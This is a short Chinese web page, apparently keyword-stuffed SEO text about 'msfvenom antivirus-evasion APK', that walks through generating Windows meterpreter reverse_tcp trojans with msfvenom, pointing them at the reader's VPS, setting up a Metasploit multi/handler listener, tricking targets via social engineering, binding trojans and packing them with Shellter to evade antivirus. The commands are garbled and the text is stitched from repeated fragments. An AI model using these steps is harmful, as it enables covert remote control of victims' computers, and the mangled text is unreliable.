首先msfvenom免杀apk,生成一个免杀的MSF木马msfvenom免杀apk,使用命令 msfvenom p windowsx64meterpreterreverse_tcp LHOST= LPORT=4444 f exe expexe,其中LHOST是你的vps地址,LPORT是监听端口接着,配置MSF监听端口,使用命令 use exploitmultihandler,设置payload为payload windowsx64meterpreter。
简介在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行msfvenom免杀apk我们的木马或者点击我们准备好的恶意链接木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马捆绑木马以及对木马。
首先,使用msfvenom生成没有加壳的exe文件,代码如下msfvenom p windowsmeterpreterreverse_tcp LHOST=28 LPORT=6666 f exe optshellexe然后,将生成的exe文件放入Windows2003系统中进行木马检测,结果显示为木马文件接着,利用shellter对上述exe文件进行免杀处理在Kali环境。
发表评论